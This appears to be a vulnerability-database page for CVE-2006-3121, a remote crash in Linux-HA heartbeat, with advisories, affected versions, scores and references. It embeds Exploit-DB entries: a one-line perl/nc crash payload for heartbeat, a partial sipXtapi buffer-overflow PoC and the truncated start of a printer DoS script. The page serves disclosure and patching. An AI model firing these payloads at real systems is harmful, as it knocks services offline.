CVE-2006-3121
Published 2006-08-17
Priority P4 · 24 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 12.59% (95.7th percentile)
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | heartbeat | < heartbeat 1.2.4-14 (bookworm) | heartbeat 1.2.4-14 (bookworm) |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| heartbeat | heartbeat | >= 0 < 1.2.4-14 | 1.2.4-14 |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| high_availability_linux_project | heartbeat | — | — |
| linux-ha | heartbeat | <= 1.2.4 | — |
CVSS provenance
nvd · v2.0 · 5.0 · MEDIUM · AV:N/AC:L/Au:N/C:N/I:N/A:P
osv · 5.0 · MEDIUM
vendor_debian · 5.0 · MEDIUM
GHSA
GHSA-qj99-gqqj-q94c: The peel_netstring function in cl_netstring
ghsa_unreviewed·2022-05-01
CVE-2006-3121 [MEDIUM] GHSA-qj99-gqqj-q94c: The peel_netstring function in cl_netstring
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
GHSA
GHSA-fc9v-f38v-7g92: XHA (Linux-HA) on the BlueCat Networks Adonis DNS/DHCP Appliance 5
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-4205 [MEDIUM] GHSA-fc9v-f38v-7g92: XHA (Linux-HA) on the BlueCat Networks Adonis DNS/DHCP Appliance 5
XHA (Linux-HA) on the BlueCat Networks Adonis DNS/DHCP Appliance 5.0.2.8 allows remote attackers to cause a denial of service (heartbeat control process crash) via a UDP packet to port 694. NOTE: this may be the same as CVE-2006-3121.
OSV
CVE-2006-3121: The peel_netstring function in cl_netstring
osv·2006-08-17·CVSS 5.0
CVE-2006-3121 [MEDIUM] CVE-2006-3121: The peel_netstring function in cl_netstring
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
Ubuntu
heartbeat vulnerability
vendor_ubuntu·2006-08-16
CVE-2006-3121 heartbeat vulnerability
Title: heartbeat vulnerability
Summary: heartbeat vulnerability
Yan Rong Ge discovered that heartbeat did not sufficiently verify some
packet input data, which could lead to an out-of-boundary memory
access. A remote attacker could exploit this to crash the daemon
(Denial of Service).
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Debian
CVE-2006-3121: heartbeat - The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High...
vendor_debian·2006·CVSS 5.0
CVE-2006-3121 [MEDIUM] CVE-2006-3121: heartbeat - The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High...
The peel_netstring function in cl_netstring.c in the heartbeat subsystem in High-Availability Linux before 1.2.5, and 2.0 before 2.0.7, allows remote attackers to cause a denial of service (crash) via the length parameter in a heartbeat message.
Scope: local
bookworm: resolved (fixed in 1.2.4-14)
bullseye: resolved (fixed in 1.2.4-14)
forky: resolved (fixed in 1.2.4-14)
sid: resolved (fixed in 1.2.4-14)
trixie: resolved (fixed in 1.2.4-14)
No detection rules found.
Exploit-DB
Linux-HA Heartbeat 2.0.6 - Remote Denial of Service
exploitdb·2006-08-13
CVE-2006-3121 Linux-HA Heartbeat 2.0.6 - Remote Denial of Service
Linux-HA Heartbeat 2.0.6 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/19516/info
Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability.
By successfully exploiting this issue, attackers can crash the master control process. This may result in the failure of services that depend on the application's functionality.
perl -e 'print "###\n2147483647heart attack:%%%\n"' | nc -u 192.168.1.12 694
Exploit-DB
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
exploitdb·2006-07-10
CVE-2006-3524 SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipx.pl \n";
exit;}
$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END
print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target)
Exploit-DB
OCE 3121/3122 Printer - 'parser.exe' Denial of Service
exploitdb·2006-04-26
CVE-2006-2108 OCE 3121/3122 Printer - 'parser.exe' Denial of Service
OCE 3121/3122 Printer - 'parser.exe' Denial of Service
---
#!/usr/bin/perl
#
#OCE 3121/3122 Printer DoS Exploit
#----------------------------
#By Herman Groeneveld aka sh4d0wman
#trancelover75 [AT] gmail.com
#
#Description: the printer runs a webserver to provide various printing tasks from
#java enabled browsers. Input is being filtered for bad characters.
#However it is vulnerable to a long url request. This will either reboot or crash the device.
#
#On crash, the "system" led on the printer changes from green to orange. No further printing is done
#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display.
#On reboot, printing resumes after the device has completed its reboot cycle.
#
#Crash is hard to accomplish. Play with the buffer inpu
No writeups or analysis indexed.
http://secunia.com/advisories/21505
http://secunia.com/advisories/21511
http://secunia.com/advisories/21518
http://secunia.com/advisories/21521
http://secunia.com/advisories/21629
http://security.gentoo.org/glsa/glsa-200608-23.xml
http://www.debian.org/security/2006/dsa-1151
http://www.linux-ha.org/SecurityIssues
http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt
http://www.mandriva.com/security/advisories?name=MDKSA-2006:142
http://www.securityfocus.com/bid/19516
http://www.ubuntu.com/usn/usn-335-1
http://www.vupen.com/english/advisories/2006/3288
https://exchange.xforce.ibmcloud.com/vulnerabilities/28396
Published: 2006-08-17